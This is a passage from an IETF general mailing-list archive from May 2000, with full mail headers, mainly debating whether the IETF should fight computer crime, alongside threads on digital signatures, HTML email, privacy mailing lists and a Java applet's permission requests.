for microphone input, and has a full range of features already.
The great benefit is the enabling of asynchronous ("any time, any
place") spoken language instruction. Previously there have been
no real solutions for that need.
"Wimba.com is led by Professor Keith Ross, formerly professor at
the University of Pennsylvania (Engineering and Wharton Schools)
and professor in the multimedia communications department at
Institut Eurécom." (France)
Cheers,
James
>From owner-ietf-outbound Mon May 22 09:50:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA02353
for [EMAIL PROTECTED]; Mon, 22 May 2000 09:50:02 -0400 (EDT)
Received: from newdev.harvard.edu (newdev.eecs.harvard.edu [140.247.60.212])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA02098
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 09:45:45 -0400 (EDT)
Received: (from sob@localhost)
by newdev.harvard.edu (8.9.3/8.9.3) id JAA07247;
Mon, 22 May 2000 09:45:24 -0400 (EDT)
Date: Mon, 22 May 2000 09:45:24 -0400 (EDT)
From: Scott Bradner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Should IETF do more to fight computer crime?
Cc: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> Scott Bradner gave a presentation at the G8 hi-tech crime event in Paris last
> week
the presentation is at:
http://golem.sobco.com/presentations/2000.05.17-g8/index.htm
since the real work of the confreence was done in private it was hard
to tell what was actually going on. But the presentations were
mostly content free.
2 or 3 of the presentations actually had some content and reality
about the Internet - one from an Intel rep and another from someone
from Canada (his card is at home and I do not remember his name)
stood out.
the government/police presentations generally called for consistant
rules between countries, a 24/7 support center or traceability
I had to leave before the final discussion session so do not
know what happened there
Scott
>From owner-ietf-outbound Mon May 22 10:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA02748
for [EMAIL PROTECTED]; Mon, 22 May 2000 10:10:02 -0400 (EDT)
Received: from mercury.lss.emc.com (mercury.eng.emc.com [168.159.40.77])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA02606
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 10:02:13 -0400 (EDT)
Received: by mercury.eng.emc.com with Internet Mail Service (5.5.2650.21)
id <KKFST4XS>; Mon, 22 May 2000 10:07:18 -0400
Message-ID: <[EMAIL PROTECTED]>
From: "nandyalam, rajesh" <[EMAIL PROTECTED]>
To: "'Kumar Subramanian'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
[EMAIL PROTECTED]
Subject: RE: Active networks
Date: Mon, 22 May 2000 09:58:59 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Hi,
Could anybody send me some info on PAM ( Pluggable authentication
modules) on Solaris 8. I would like to implement PAM in my application to
make it work in Kerberos environment. Could anybody help me out in this
issue.
Thanks in advance,
Rajesh.
-----Original Message-----
From: Kumar Subramanian [mailto:[EMAIL PROTECTED]]
Sent: Monday, May 22, 2000 4:01 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: Active networks
You can get some information from the following links:
-Kumar
http://www.cc.gatech.edu/projects/canes/publications.html
http://www.cis.upenn.edu/~switchware/
http://www.cis.upenn.edu/~boosters/p4home.html
>>> <[EMAIL PROTECTED]> 05/22/00 11:05AM >>>
Hi,
I would like to get some info on Active Network. Can
somebody help ?
Narayanan.K,
[EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 22 11:30:26 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA03706
for [EMAIL PROTECTED]; Mon, 22 May 2000 11:30:01 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA03588
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 11:21:57 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id 2333F1E052; Mon, 22 May 2000 11:21:58 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id LAA06692;
Mon, 22 May 2000 11:21:57 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 1D32F35DC2; Mon, 22 May 2000 11:21:56 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Jacob Palme <[EMAIL PROTECTED]>
Cc: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 22 May 2000 11:21:55 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <v04210102b54c9601e1fc@[193.173.137.42]>, Jacob Palme writes:
>Should IETF do anything to fight the increasing incidences
>of net criminality? Can we do anything? Can the protocols,
>which IETF manages, be modified so as to make it easier
>to fight virus distribution, mail bombing, ping attacks
>and the other ways in which people are harassing the
>Internet?
>
>Or would such changes to the Internet protocols mean
>more invasion of privacy, in a way which is even less
>acceptable than letting the criminals continue? It seems
>that there is a strong group in IETF which likes the
>freedom of the net and believes that changes to stop
>criminal usage would also remove this freedom? Is this
>true, or can we fight net criminaltiy without risking
>the freedom of the net?
Harald made some very good points; let me just add a few more.
First -- as a computer security professional, I'm certainly concrned
about "cybercrime". But the changes you suggest cut both ways. I
don't know how to weaken a security protocol selectively, so that only
"good guys" can read the traffic. Apart from varying definitions of
what is good and bad -- and even the major democracies on this planet
have very different standards on that -- a hole is a weakness, and
requires much more complexity to protect that hole. Complexity is, in
itself, a security problem; in my opinion, and in the opinion of most
(though, of course, not all) of the security folks in the IETF, adding
any sort of back door to our cryptographic protocols would create far
more security problems than it would solve. (For more on this line of
reasoning, see http://www.cdt.org/crypto/risks98.)
There is also a major limit to the utility of strong authentication for
tracing back attacks: just as the bad guys use other folks' computers
to launch their attacks, they will also use others' cryptographic
credentials. I'm far from convinced, for example, that the LOVEBUG
virus would have been prevented were all mail digitally signed, because
I strongly suspect that the attack would have invoked a digital
signature API to generate digitally-signed copies of itself. The real
effect of such a policy would be a vast decrease in privacy on the net.
(I note that the EU has very strong privacy protection laws, and U.S.
law strongly protects anonymity as necessary for free political speech.)
In short -- yes, there are problems, but the best approach for the IETF
is to design, build, and deploy stronger systems.
--Steve Bellovin
>From owner-ietf-outbound Mon May 22 12:30:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA04600
for [EMAIL PROTECTED]; Mon, 22 May 2000 12:30:03 -0400 (EDT)
Received: from cuimail.unige.ch (cuimail.unige.ch [129.194.69.50])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA04575
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 12:28:27 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from cuimail.unige.ch ([129.194.69.17])
by cuimail.unige.ch (PMDF V5.2-32 #37942)
with ESMTP id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Mon,
22 May 2000 18:28:25 +0200 (MET DST)
X-URL: http://cui.unige.ch/eao/www/Bertrand.html
Date: Mon, 22 May 2000 18:28:23 +0200
X-Face: $LChH{%os*16AP:(5pI<*1fqtXx?14aOqKLUfv{>&:+,G6Y+ei9aTSM:D,ie2w=~vr9nsSj
FY4bH+)|=<_V|1@4";>_aJ}QxqfL['1]O3i`)wmc]#,^4Ny#&_|k?EEcrb7aIle|fs742v:5WjNM9#
ufe5itBNu-z*[']\@b|ut#z,r8b#ax^CsUUku2I#bgvZ&XxZ/kc#7Gi{5OB%h88yly"YZG*u}jD^tL
wUfdV#%YU.|hU|HEOfSCGxb
Subject: Re: Should IETF do more to fight computer crime?
To: "Steven M. Bellovin" <[EMAIL PROTECTED]>
Cc: Jacob Palme <[EMAIL PROTECTED]>, IETF general mailing list <[EMAIL PROTECTED]>
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
X-Mailer: exmh version 2.0.2 2/24/98
Content-type: text/plain; charset=us-ascii
X-Loop: [EMAIL PROTECTED]
Steve Bellovin <[EMAIL PROTECTED]> said:
> I'm far from convinced, for example, that the LOVEBUG virus would
> have been prevented were all mail digitally signed, because I
> strongly suspect that the attack would have invoked a digital
> signature API to generate digitally-signed copies of itself.
I would hope that any software I use, that is able to put my digital signature
on some data, would ask me for my pass-phrase every time my private key is
used. I would even hope that such software wouldn't be able to use my private
key without the pass-phrase, otherwise anybody with access to my computer could
easily forge my signature.
If this requirement is not met, the digital signature has no value.
Peace,
Bertrand Ibrahim.
--------------------------------------------
[EMAIL PROTECTED]
http://cui.unige.ch/eao/www/Bertrand.html
>From owner-ietf-outbound Mon May 22 12:40:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA04785
for [EMAIL PROTECTED]; Mon, 22 May 2000 12:40:03 -0400 (EDT)
Received: from europe.std.com (europe.std.com [199.172.62.20])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA04624
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 12:30:26 -0400 (EDT)
Received: from world.std.com ([EMAIL PROTECTED] [199.172.62.5])
by europe.std.com (8.9.3/8.9.3) with ESMTP id MAA06490;
Mon, 22 May 2000 12:30:23 -0400 (EDT)
Received: from localhost (brunner@localhost)
by world.std.com (8.9.3/8.9.3) with SMTP id MAA05537;
Mon, 22 May 2000 12:30:17 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Authentication-Warning: world.std.com: brunner@localhost didn't use HELO protocol
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: New mailing list for data protection & privacy (cookies et al)
Mime-Version: 1.0
Content-Type: text/plain
Date: Mon, 22 May 2000 12:30:17 -0400
From: Eric Brunner <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
I've set up a mailing list for discussion of policy implications of http
cookies, and other persistent session artifacts which may be used as
identifiers. We've list(s) for discussion of the mechanism(s), e.g., Tom
Limoncelli's http-state list, the W3C P3P interop list, the mozilla general
list, and of course the overworked ietf general list. These all tend to
progress towards implementations, not towards user documentation.
What I'd like to see is something along the lines of a draft in the IETF's
User Services Area which is updated to reflect the changes of mechanism(s)
employed, and what effect these have for user data protection and on-line
privacy, modified for the browser, host and "idiot's guide" genre of user
documentation. Rather than write a -00.txt draft first, then solicit any
technical contributions, I've set up the contribution list first.
Writing for the IESG, Keith Moore and Ned Freed have produced "Use of HTTP
State Management" <draft-iesg-http-cookies-03.txt>, intended as a BCP RFC.
This is a step in the right direction, and one that can be improved upon
and made "accessible" to the general reader.
To subscribe, simply send mail to:
[EMAIL PROTECTED]
The usual majordomo rules apply.
Cheers,
Eric
>From owner-ietf-outbound Mon May 22 12:50:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA05035
for [EMAIL PROTECTED]; Mon, 22 May 2000 12:50:03 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id MAA04934
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 12:46:15 -0400 (EDT)
Received: (qmail 31395 invoked from network); 22 May 2000 16:46:16 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 22 May 2000 16:46:16 -0000
Received: (qmail 24667 invoked from network); 22 May 2000 16:46:15 -0000
Received: from ppp-47-223.lander.es (HELO salva) (195.76.47.223)
by lince.lander.es with SMTP; 22 May 2000 16:46:15 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Mon, 22 May 2000 18:53:23 +0200
To: Jacob Palme <[EMAIL PROTECTED]>
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: Re: HTML in e-mail (Was: VIRUS WARNING)
Cc: [EMAIL PROTECTED]
In-Reply-To: <v04210112b541f201336f@[130.237.150.138]>
References: < <00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
<00ae01bfbb7b$c7f8b500$[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id MAA04934
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
Hello Jacob,
At 19:51 12/05/00 +0200, Jacob Palme wrote:
>At 13.59 -0400 0-05-11, Scot Mc Pherson wrote:
>> I am not so sure I totally agree. Why exactly do we need HTML based
>> e-mail...Is it really necessary? E-mail is a service for transmitting a
>> written message, and written messages certainly don't require background
>> graphics or a full blown graphically based webpage.
>
>Why should not graphics be of value in e-mail, when it is of
>value in most other media like web pages, books, newspapers,
>magazines, etc? Why should the e-mail medium not benefit
>from graphics to enhance understandability and readability?
>
Much more, I like the posiblity to add inteligence on e-mail address and
HTML not only in the body, I like it i.e. in the "acuse de recibo" (sorry I
dont know the name of this in English it´s when you sing that you get a
message), for instance in this mesage I can put bottons when people in
this list can click, one saying you are idiot, another go ahead i like it,
other I don´t understand you,... so I can get feedback for the people in
this list that don´t reply but maybe like to click in a buttom.
Of course not only text buttoms, you know painters when something is bad
say that its purple, something neutro they call it green, something cool is
yellow, so may be a painters list group want a "acuse de recibo" of one
colour and when you put a message you get a mix of the colours in a picture
as feedback, or musicians do something similar with music, or yoguis that
can control they heart pulsations transmit their pulsations for
coordination of their hearts in a yoga experience,... who knows the best
way to get the feedback goal of simbiosis whith others?, we cann´t put
limits to cultural manifestations but those which come from security and
privacy issues as well as give efective filtering posibilities for users.
Best Regards,
Salva
>Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
>for more info see URL: http://www.dsv.su.se/jpalme/
>
>
>
>From owner-ietf-outbound Mon May 22 13:00:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA05262
for [EMAIL PROTECTED]; Mon, 22 May 2000 13:00:05 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id MAA04941
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 12:46:26 -0400 (EDT)
Received: (qmail 31432 invoked from network); 22 May 2000 16:46:27 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 22 May 2000 16:46:27 -0000
Received: (qmail 24721 invoked from network); 22 May 2000 16:46:22 -0000
Received: from ppp-47-223.lander.es (HELO salva) (195.76.47.223)
by lince.lander.es with SMTP; 22 May 2000 16:46:22 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Mon, 22 May 2000 18:53:31 +0200
To: Musandu <[EMAIL PROTECTED]>
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: Re: Financial Standards Work group?
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Hello Nyagudi,
At 10:33 14/05/00 +0300, you wrote:
>It may just be time for the IETF to develop a financial standards work group
>seperate from the applications work group. I can even forsee a Simple Cash
>Transfer Protocol? any objections?
As a consumer I will like the posibility of doing anonimous transactions.
As a small trader I like the smallest transactions comisions.
So I like something like the real cash that can be transmited from one
computer to other with anonimate and without financial traders intervection.
It will have almost the same fraud problem than copyrright protection
systems, not only I reconize that I was to dogmatimac about their general
crash of protection systems but also cash systems has and avantege,
citizens will imidiatly check the false cash, so perhaps with this citizens
colaboration fraud can be quickly stoped, I think that the cost of money
check will be much more less than trasactions cost.
Sure that VISA and citibank have a diferent point of view, but I realy
think that if you foorsee a cash service with the anonimous and lowest
comisions caracteristics you will bring a great impulse to e-comerce.
>Yours sincerely,
>Nyagudi Musandu
>
Best Regards,
Salva
P.D. If you need help for this ask back-up insdustrie, they will be very
happy if people have money at their computers.
>From owner-ietf-outbound Mon May 22 13:10:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA05626
for [EMAIL PROTECTED]; Mon, 22 May 2000 13:10:03 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id MAA04948
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 12:46:29 -0400 (EDT)
Received: (qmail 31440 invoked from network); 22 May 2000 16:46:30 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 22 May 2000 16:46:30 -0000
Received: (qmail 24758 invoked from network); 22 May 2000 16:46:28 -0000
Received: from ppp-47-223.lander.es (HELO salva) (195.76.47.223)
by lince.lander.es with SMTP; 22 May 2000 16:46:28 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Mon, 22 May 2000 18:53:37 +0200
To: zozo <[EMAIL PROTECTED]>
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: Re: Mobile Ad hoc
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id MAA04948
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
Hello Zozo,
At 17:57 10/05/99 +0300, you wrote:
>What are the benefits from
> "Integeration between Mobile IP and Ad hoc networks"?
>
>
I like a Integration wich allow small entrepenurials to develop aplications
for mobile, i.e. I think that will have a great future the games for
weekends and holidays wich combine virtuality and reality, mainly those
wich impulse human contacts on the real world...
Users will appreciate if we let entrepenurials to develop the aplications,
then some telecos CEO´s can continue their "creative" strategy: buy, buy,
buy...
Best Regards,
Salva
>From owner-ietf-outbound Mon May 22 13:20:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA05833
for [EMAIL PROTECTED]; Mon, 22 May 2000 13:20:03 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA05174
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 12:57:26 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-blue.research.att.com (Postfix) with ESMTP
id CFA964CE17; Mon, 22 May 2000 12:57:22 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id MAA08474;
Mon, 22 May 2000 12:57:22 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id B0CCA35DC2; Mon, 22 May 2000 12:57:21 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: Jacob Palme <[EMAIL PROTECTED]>, IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 22 May 2000 12:57:21 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, [EMAIL PROTECTED] wri
tes:
>Steve Bellovin <[EMAIL PROTECTED]> said:
>> I'm far from convinced, for example, that the LOVEBUG virus would
>> have been prevented were all mail digitally signed, because I
>> strongly suspect that the attack would have invoked a digital
>> signature API to generate digitally-signed copies of itself.
>
>I would hope that any software I use, that is able to put my digital signature
>on some data, would ask me for my pass-phrase every time my private key is
>used. I would even hope that such software wouldn't be able to use my private
>key without the pass-phrase, otherwise anybody with access to my computer coul
>d
>easily forge my signature.
>
>If this requirement is not met, the digital signature has no value.
Yup...
More precisely -- in the Holy Name of Convenience, many (most?) mailers
permit a passphrase to be cached for some amount of time. A virus
could exploit that. Or it could wait until you tried sending some
signed mail, and grab the key then. It could even wait, and then pop
up its own key window that masquerades as the real one, followed by a
box saying that you entered your passphrase incorrectly, and that you
should retry it, in the real prompt. There are operating system
techniques that can prevent that latter attack, such as the "trusted
path". But trusted path support is rare on UNIX systems, and though
Windows NT does use it for login passwords, I haven't yet seen a secure
NT mailer that uses it. (Btw -- though there are security risks here,
there are also security risks in using such technologies, since if it's
too inconvenient to send secure email, there will be more sent in the
clear. That's a risk, too; pick your poison.)
It's for reasons like these that it has been said that conventional
signatures are weakly bound to a document, but strongly bound to the
individual, while digital signatures are strongly bound to a document
but weakly bound to an individual. A digital signature provides proof
that a particular private key was used to produce it. Just who
employed that key is a separate question, and one that must be
carefully evaluated when deciding how much weight to attach to the
signature.
--Steve Bellovin
>From owner-ietf-outbound Mon May 22 13:50:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA06769
for [EMAIL PROTECTED]; Mon, 22 May 2000 13:50:02 -0400 (EDT)
Received: from infidel.boolean.net ([EMAIL PROTECTED] [198.144.206.49])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA06623
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 13:43:49 -0400 (EDT)
Received: from gypsy (gypsy.boolean.net [198.144.202.243])
by infidel.boolean.net (8.9.3/8.9.3) with SMTP id RAA10957
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 17:43:40 GMT
(envelope-from [EMAIL PROTECTED])
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Mon, 22 May 2000 10:43:39 -0700
To: IETF general mailing list <[EMAIL PROTECTED]>
From: "Kurt D. Zeilenga" <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
<rant>
We must be careful not to classify our efforts as preventing crime.
Crime is matter of law and law is jurisdictional. As the Internet
is crosses jurisdictional boundaries, there is not one clear
definition of law and hence no clear definition of crime. And
crime is not always bad. Some crime, such as civil disobedience
to promote basic human rights, is good.
I believe it appropriate to discuss such issues in the general
context of security. We should continue to enumerate, discuss,
and resolve security considerations. Though we might be driven
by our own needs (hopefully well intended), protocols we develop
can and will be used for both legal and illegal activities
(regardless of our intent).
The IETF should focus on providing technology to implement
secure solutions irregardless of whether the solutions are
used for legal or illegal activities.
</rant>
Kurt
>From owner-ietf-outbound Mon May 22 14:40:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA07637
for [EMAIL PROTECTED]; Mon, 22 May 2000 14:40:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA07579
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 14:34:34 -0400 (EDT)
Received: from [130.237.161.46] (dsvmc046.dsv.su.se [130.237.161.46])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id UAA26890;
Mon, 22 May 2000 20:34:31 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210103b54f26125316@[130.237.150.138]>
In-Reply-To:
<[EMAIL PROTECTED]>
References:
<[EMAIL PROTECTED]>
Date: Mon, 22 May 2000 20:01:10 +0200
To: "Steven M. Bellovin" <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Cc: IETF general mailing list <[EMAIL PROTECTED]>
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Does there exist a mailinglist specially oriented towards
cybercrime and its prevention? If not, should we start such
a list?
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Mon May 22 14:50:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA07809
for [EMAIL PROTECTED]; Mon, 22 May 2000 14:50:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA07586
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 14:34:38 -0400 (EDT)
Received: from [130.237.161.46] (dsvmc046.dsv.su.se [130.237.161.46])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id UAA26940;
Mon, 22 May 2000 20:34:37 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210109b54f27459b46@[130.237.150.138]>
In-Reply-To:
<[EMAIL PROTECTED]>
References:
<[EMAIL PROTECTED]>
Date: Mon, 22 May 2000 20:14:36 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Cc: Fredrik Björck <[EMAIL PROTECTED]>, Mats Wiklund <[EMAIL PROTECTED]>
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Content-Transfer-Encoding: 8bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
At 11.21 -0400 0-05-22, Steven M. Bellovin wrote:
> In short -- yes, there are problems, but the best approach for the IETF
> is to design, build, and deploy stronger systems.
But would not better logg production in routers be an aid
in finding the villain behind computer crimes?
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Mon May 22 15:00:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA07973
for [EMAIL PROTECTED]; Mon, 22 May 2000 15:00:03 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA07593
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 14:34:39 -0400 (EDT)
Received: from [130.237.161.46] (dsvmc046.dsv.su.se [130.237.161.46])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id UAA26947;
Mon, 22 May 2000 20:34:38 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v0421010ab54f27b8b658@[130.237.150.138]>
In-Reply-To:
<[EMAIL PROTECTED]>
References:
<[EMAIL PROTECTED]>
Date: Mon, 22 May 2000 20:14:55 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 22.52 +0200 0-05-21, Harald Tveit Alvestrand wrote:
> They're making cooperation, whether we want it or not.
> Not an IETF problem.
Maybe not an IETF problem, but the way we act when the
police come should be discussed either in IETF or in
ISOC.
A well-known example from some years ago. A very popular
so-called anonymity server was running in Helsinki.
(I would rather designate it as a pseuodynymity server.)
Its data base know who was behind each pseudonym,
and used this to allow the forwarding of e-mail to
pseudonyms. The anonymity server sent such messages
along to the real e-mail address, but without divulging
what that address was.
Now came the scientology church. They are very against
all kinds of discussions and divulging of information
about them to outsiders. Someone had used the anonymity
server in Helsinki to distribute, on a usenet group,
information which the scientologists did not like.
They went to the police (in the USA) saying that this
person had infringed on their copyright by publishing
their secret documents on Usenet. The police in the
USA contacted the police in Finland. The police in
Finland went to the anonymity server and gave him
to choices: Either we take the whole server, or you
tell us who is behind this pseudonym. He told them
under duress who it was. But shortly after that, he
shut down the server.
Should the Finnish police really have done this?
Should he have accepted their requests, or should
he have called a lawyer and tried to move the issue
of whehter to divulge this information into the
courts in Finland?
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Mon May 22 15:10:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id PAA08230
for [EMAIL PROTECTED]; Mon, 22 May 2000 15:10:02 -0400 (EDT)
Received: from gungnir.fnal.gov (gungnir.fnal.gov [131.225.80.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA07685
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 14:41:19 -0400 (EDT)
Received: from gungnir.fnal.gov (localhost [127.0.0.1])
by gungnir.fnal.gov (8.9.1/8.9.1) with ESMTP id NAA11652;
Mon, 22 May 2000 13:41:18 -0500 (CDT)
Message-Id: <[EMAIL PROTECTED]>
To: James Salsman <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
From: "Matt Crawford" <[EMAIL PROTECTED]>
Subject: Re: asynchronous audio conferencing at www.wimba.com
Date: Mon, 22 May 2000 13:41:17 -0500
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
As a linguistic exercise, you might reconcile this message, which you
get when you refuse to grant their applets read/write/delete/execute
access to all your files:
In order to run the Wimba forums application, you will need to
grant our applet a certain number of privileges. Our applet is
signed to reassure you of its authenticity and safety. You can
trust our applet.
with their terms of use:
c.ANY MATERIAL DOWNLOADED OR OTHERWISE OBTAINED THROUGH THE USE OF
THE SERVICE IS DONE AT YOUR OWN DISCRETION AND RISK AND THAT YOU WILL
BE SOLELY RESPONSIBLE FOR ANY DAMAGE TO YOUR COMPUTER SYSTEM OR LOSS
OF DATA THAT RESULTS FROM THE DOWNLOAD OF ANY SUCH MATERIAL.
